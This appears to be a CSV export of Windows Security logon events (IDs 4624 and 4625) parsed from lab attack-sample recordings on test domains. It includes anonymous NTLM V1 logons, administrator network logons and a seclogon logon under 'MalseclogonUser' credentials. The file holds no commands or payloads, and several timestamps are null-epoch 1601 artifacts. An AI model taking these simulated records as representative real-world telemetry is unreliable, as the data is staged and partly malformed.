AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5278 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d4 + C:\Windows\System32\services.exe + - + - + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-03-19T03:23:57.397648+04:00,1552951437.397648,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565611 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e25f + 3 + Kerberos + Kerberos + + 1054A084-EFFD-F992-9C74-63873C88272E + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55873 + %%1840 + +" +2019-03-19T03:23:52.507387+04:00,1552951432.507387,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565599 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x15e1a7 + 3 + Kerberos + Kerberos + + 14CCCD18-A781-AC28-C773-EA57D49F4B90 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49222 + %%1840 + +" +2019-03-19T03:23:51.772355+04:00,1552951431.772355,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565596 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e162 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55872 + %%1840 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565653 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x16792b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 55878 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,3,Advapi,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 161473 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1009 + svc01 + MSEDGEWIN10 + 0x10b6b3 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x22afa1 + 3 + Advapi + MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x140c + C:\Windows\System32\inetsrv\w3wp.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-13T22:04:58.363696+04:00,1550081098.363696,4624,admin01,EXAMPLE,10,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227762 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14a321 + 10 + User32 + Negotiate + PC01 + AF83A89C-C68A-5397-5AC6-24A0C4D2BAF6 + - + - + 0 + 0x4b8 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49274 + +" +2019-02-13T22:04:57.462400+04:00,1550081097.4624,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227747 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x148f5d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:04:45.905783+04:00,1550081085.905783,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227740 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14871d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:02:05.418087+04:00,1550080925.418087,4624,user01,EXAMPLE,7,Negotiat,-,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227708 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414d9 + 7 + Negotiat + Negotiate + PC01 + 42DAF7A9-F185-F292-0EBD-B86A26624D31 + - + - + 0 + 0x208 + C:\Windows\System32\lsass.exe + - + - + +" +2019-02-13T22:02:04.436676+04:00,1550080924.436676,4624,user01,EXAMPLE,11,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227701 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414c8 + 11 + User32 + Negotiate + PC01 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x704 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 